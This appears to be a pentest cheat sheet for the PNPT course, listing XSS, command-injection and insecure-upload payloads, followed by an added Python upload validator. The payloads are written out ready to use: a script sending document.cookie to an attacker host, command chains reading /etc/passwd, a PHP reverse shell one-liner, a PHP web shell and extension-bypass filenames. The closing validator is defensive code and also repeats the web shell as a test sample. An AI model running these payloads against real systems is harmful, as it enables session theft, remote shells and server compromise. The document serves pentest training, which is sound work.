Cross-Site Scripting (XSS) - Cookie Stealing
Exfiltrate a user’s session cookie to a remote server using a script tag.
<script>var i = new Image;i.src="http://{{attacker_ip}}?"+document.cookie;</script>

XSS - Image Error Trigger
Use the onerror attribute of an image tag to execute JavaScript when the image fails to load.
<img src=x onerror="alert(document.cookie)">

Command Injection - Basic Chaining
Chain multiple commands together using logical operators or separators.
{{input}}; whoami
{{input}} && ls -la
{{input}} | cat /etc/passwd

Command Injection - Reverse Shell (PHP)
Execute a PHP one-liner to establish a reverse shell back to the attacker machine.
; php -r '$sock=fsockopen("{{attacker_ip}}",{{port}});exec("/bin/sh -i <&3 >&3 2>&3");' ;

Insecure File Upload - PHP Shell
Upload a simple PHP backdoor to execute commands on the server.
<?php system($_GET['cmd']); ?>

Insecure File Upload - Bypass Techniques
Rename the shell extension or use double extensions to bypass simple filters.
shell.php.png
shell.phtml
shell.php5
shell.jpg (with PHP code inside)

Description
Web exploitation involves identifying and leveraging vulnerabilities in web applications to gain unauthorized access or execute arbitrary code. In PNPT, key techniques include Cross-Site Scripting (XSS) for user impersonation, Command Injection for server-side code execution, and Insecure File Upload for establishing persistent backdoors.
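
A server-side check that rejects the four filenames listed under Insecure File Upload - Bypass Techniques, added here as an example and not part of the original page. It is written in Python; the image-only allowlist, the function name check_upload and the sample bytes are assumptions.

```python
import os
import re

# Assumed policy for an image-only upload endpoint (hypothetical, not from the page).
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
# Extensions commonly mapped to the PHP handler; matched against every name segment.
PHP_EXT = re.compile(r"^(php\d*|phtml|phar|pht)$", re.I)
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

def check_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for an uploaded file name and its content."""
    name = os.path.basename(filename.replace("\\", "/"))
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no extension"
    exts = [p.lower() for p in parts[1:]]
    # Double extensions: inspect every segment, not only the last one.
    if any(PHP_EXT.match(e) for e in exts):
        return False, "executable extension in name"
    if exts[-1] not in ALLOWED_EXT:
        return False, "extension not on allowlist"
    # The leading bytes must agree with the claimed type.
    if not data.startswith(MAGIC[exts[-1]]):
        return False, "content does not match extension"
    # A valid image header can still be followed by embedded PHP.
    if b"<?php" in data.lower():
        return False, "PHP open tag in content"
    return True, "ok"

# Constructed sample uploads, using the names from the list above.
PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
JPG_WITH_PHP = b"\xff\xd8\xff\xe0" + b"<?php system($_GET['cmd']); ?>"
SAMPLES = [("shell.php.png", PNG), ("shell.phtml", PNG), ("shell.php5", PNG),
           ("shell.jpg", JPG_WITH_PHP), ("photo.png", PNG)]

if __name__ == "__main__":
    for fname, body in SAMPLES:
        print(fname, check_upload(fname, body))
```

Filename and content checks are only a first filter; storing uploads under a server-generated name outside the web root, in a directory with script execution disabled, is what keeps an accepted file from running.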